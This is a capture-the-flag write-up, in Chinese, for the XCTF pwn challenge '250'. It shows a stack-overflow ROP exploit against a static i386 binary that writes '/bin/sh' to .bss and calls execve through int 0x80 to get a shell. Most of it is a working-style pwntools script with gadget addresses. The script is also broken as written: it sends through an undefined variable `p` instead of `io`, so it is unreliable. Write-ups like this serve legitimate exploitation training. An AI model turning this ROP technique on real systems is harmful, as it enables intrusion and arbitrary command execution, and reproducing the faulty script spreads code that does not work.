XCTF pwn 高手进阶区 250

查看保护

静态链接

IDA打开，查看程序流程

自定义的print函数

这里外面传来temp并拷贝到v3中，但是没有考虑长度，存在栈溢出漏洞，溢出长度0x3a

那么可以考虑i386的rop

控制对应的寄存器为对应的值就可以获得shell

程序里面没有’/bin/sh’,可以控制read函数写入到bss段

那么可以 ROPgadget --binary 250 --only “pop|ret” 查看对应的gadget

bss段可以选择(这里选择不唯一)

payload构造，首先溢出在bss段写入/bin/sh

read=elf.symbols['read']
payload = b'a'*(0x3a+0x4) 
payload += p32(read) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(bss) + p32(0x8)

然后修改寄存器的值

payload += p32(pop_eax_ret) + p32(0xb) 
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bss) + p32(int_addr)

完整ex

from pwn import *
#static 构造exceve() int80 
context(log_level='debug')

io=process("./250")
elf=ELF("./250")
io.recv()
io.sendline(b'200')
io.recv()
#read=0x806d510
read=elf.symbols['read']
bss=0x080ECB00
pop_edx_ecx_ebx_ret=0x806efe0
pop_eax_ret=0x80b89e6
int_addr=0x806cbb5


payload = b'a'*(0x3a+0x4) 
payload += p32(read) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(bss) + p32(0x8)
payload += p32(pop_eax_ret) + p32(0xb) 
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bss) + p32(int_addr)

p.sendline(payload)

p.send(b'/bin/sh\x00')

io.interactive()